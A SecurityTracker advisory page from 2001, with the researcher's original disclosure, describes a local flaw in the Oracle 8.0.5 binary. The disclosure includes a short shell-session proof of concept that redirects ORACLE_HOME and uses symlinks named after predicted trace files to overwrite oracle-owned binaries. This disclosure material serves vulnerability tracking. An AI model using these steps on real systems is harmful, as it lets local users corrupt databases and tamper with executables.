SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Database)  >   Oracle Database Vendors:   Oracle
Oracle Database Permission Configuration Error Lets Local Users Modify Database Files, Configuration Files, and Executables
SecurityTracker Alert ID:  1002138
SecurityTracker URL:  http://securitytracker.com/id/1002138
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 3 2001
Impact:   Modification of user information

Version(s): Oracle 8.0.5
Description:   PlazaSite reported a vulnerability in Oracle 8.0.5 that allows any local user to modify any file owned by the 'oracle' user.

It is reported that there is a write permision checking error in an unspecified component of Oracle that allows any local user to write to any file owned by the 'oracle' user.
Impact:   A local user can modify and corrupt the database and modify the oracle binaries.
Solution:   No solution was available at the time of this entry.
Vendor URL:  otn.oracle.com/deploy/security/alerts.htm (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Oracle Issues Workaround) Re: Oracle Database Permission Configuration Error Lets Local Users Modify Database Files, Configuration Files, and Executables   (Oracle Security Alerts <secalert_us@oracle.com>)
The vendor has issued a workaround and plans a code fix.


 Source Message Contents
Date:  Thu, 02 Aug 2001 09:57:26 +0200
Subject:  vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6


--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit




                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested in Linux, but can be "exported" to others.

  Impact:     Any user compromise any file owned by oracle (DDBB owner).

  Author:     Juan Manuel Pascual (pask@plazasite.com)

  Status:     Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:
    There is a write permision checking error in oracle binary  that can
be used by local
users to write any file owned by oracle.

IMPACT:
    Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted .

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com





























--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii;
 name="oracle-8.0.5.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="oracle-8.0.5.txt"

Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc 
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....



--------------6B84FF8612CCC30679044832--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC